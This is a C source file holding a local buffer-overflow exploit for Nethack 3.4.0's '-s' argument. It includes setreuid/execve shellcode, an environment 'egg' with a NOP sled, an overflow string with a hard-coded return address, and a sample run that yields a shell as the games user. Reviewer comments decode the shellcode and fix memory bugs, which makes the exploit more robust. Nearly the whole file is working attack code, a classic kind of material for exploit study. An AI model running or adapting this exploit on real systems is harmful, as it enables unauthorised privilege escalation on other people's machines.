
  1. /* DSR-nethack.c by bob@dtors.net
  2.  * Vulnerability found by tsao.
  3.  *
  4.  * Local buffer overflow in nethack's "-s" argument handling that
  5.  * yields a shell running as the `games` user (uid 12 in the run below).
  6.  *
  7.  * Basic PoC code...nothing special.
  8.  *[bob@dtors bob]$ ./DSR-nethack
  9.  *
  10.  *       DSR-nethack.c By bob.
  11.  *   Local Exploit for Nethack 3.4.0
  12.  *       DSR-[www.dtors.net]-DSR
  13.  * 
  14.  *   ret: 0xbffffd86
  15.  *
  16.  * Cannot find any current entries for 
  17. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<86 fd ff bf>   [the four return-address bytes are non-printable and were garbled in this copy]
  18.  * Usage: nethack -s [-v] <playertypes> [maxrank] [playernames]
  19.  * Player types are: [-p role] [-r race]
  20.  * sh-2.05b$ id -a
  21.  * uid=12(games) gid=501(bob) groups=501(bob)
  22.  * sh-2.05b$ 
  23.  *
  24.  * www.dtors.net // www.b0f.net
  25.  */
#include <stdio.h>
#include <stdlib.h>   /* putenv */
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */
/*
 * Linux/i386 payload: 44 bytes, contains no NUL byte, so it survives being
 * passed through an environment variable.  Reviewer's decoding of the bytes:
 *   setreuid(12, 12)  -- uid 12 is "games", matching the id output in the header
 *   execve("//bin/sh", {"//bin/sh", NULL}, {NULL})
 * Grouped one instruction per string literal; the bytes are unchanged.
 */
char shellcode[] = /* shellcode by bob */
    /* sub esp,eax ; xor eax,eax ; xor ecx,ecx ; xor ebx,ebx */
    "\x29\xc4" "\x31\xc0" "\x31\xc9" "\x31\xdb"
    /* mov bl,12 ; mov ecx,ebx ; mov al,0x46 (setreuid) ; int 0x80 */
    "\xb3\x0c" "\x89\xd9" "\xb0\x46" "\xcd\x80"
    /* xor eax,eax ; push eax ; push "n/sh" ; push "//bi" ; mov ebx,esp */
    "\x31\xc0" "\x50" "\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69" "\x89\xe3"
    /* lea edx,[esp+8] ; push eax ; push ebx ; lea ecx,[esp] ; mov al,11 (execve) ; int 0x80 */
    "\x8d\x54\x24\x08" "\x50" "\x53" "\x8d\x0c\x24" "\xb0\x0b" "\xcd\x80";
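/*
 * Entry point: builds the environment "egg" and the overflowing argument,
 * then replaces this process with the nethack binary.
 *
 *   argv[2] (buf)  220 filler bytes 'A', then the 4-byte little-endian return
 *                  address, NUL-terminated.  Per the header this overflows a
 *                  stack buffer in nethack's "-s" handling (not visible here).
 *   env (smeg)     "EGG=" + NOP sled (0x90) + shellcode, NUL-terminated; the
 *                  hard-coded ret is meant to land inside that sled.
 *
 * Returns: never on success (execl replaces the image); 1 if the exec or
 * putenv fails, after reporting the error.
 *
 * NOTE(review): 0xbffffd86 is only valid for the author's Red Hat 8.0 / i386
 * stack layout (no ASLR, executable stack, same environment size).  Anywhere
 * else nethack just crashes.  The original wrote buf[224] past the end of a
 * 224-byte array and passed an automatic buffer to putenv(); both fixed below.
 */
int main(void)
{
    enum { BUF_LEN = 224, RET_OFF = 220, EGG_LEN = 1024 };
    unsigned long ret = 0xbffffd86UL;   /* Red Hat 8.0 i386, author's value */
    char buf[BUF_LEN + 1];              /* +1 for the terminating NUL */
    static char smeg[EGG_LEN];          /* putenv() keeps the pointer: must not be automatic (CERT POS34-C) */
    size_t sc_len = strlen(shellcode);

    fprintf(stdout, "\n\tDSR-nethack.c By bob.\n");
    fprintf(stdout, "Local Exploit for Nethack 3.4.0\n");
    fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");

    /* "EGG=" + shellcode + NUL must fit in the egg buffer. */
    if (sc_len + 5 > EGG_LEN) {
        fputs("shellcode too large for egg buffer\n", stderr);
        return 1;
    }

    /* Egg: NOP sled, shellcode, NUL; the name "EGG=" overwrites the first four NOPs. */
    memset(smeg, 0x90, EGG_LEN - sc_len - 1);
    memcpy(smeg + (EGG_LEN - sc_len - 1), shellcode, sc_len);
    smeg[EGG_LEN - 1] = '\0';
    memcpy(smeg, "EGG=", 4);
    if (putenv(smeg) != 0) {
        perror("putenv");
        return 1;
    }

    /* Overflow string: filler, then ret in little-endian byte order, then NUL. */
    memset(buf, 'A', RET_OFF);
    buf[RET_OFF + 0] = (char)(ret & 0xff);
    buf[RET_OFF + 1] = (char)((ret >> 8) & 0xff);
    buf[RET_OFF + 2] = (char)((ret >> 16) & 0xff);
    buf[RET_OFF + 3] = (char)((ret >> 24) & 0xff);
    buf[BUF_LEN] = '\0';

    fprintf(stdout, "ret: 0x%08lx\n", ret);   /* %lx: ret is unsigned long */

    execl("/usr/games/lib/nethackdir/nethack", "nethack", "-s", buf, (char *)NULL);

    /* Only reached if the exec failed (binary missing, not executable, ...). */
    perror("execl");
    return 1;
}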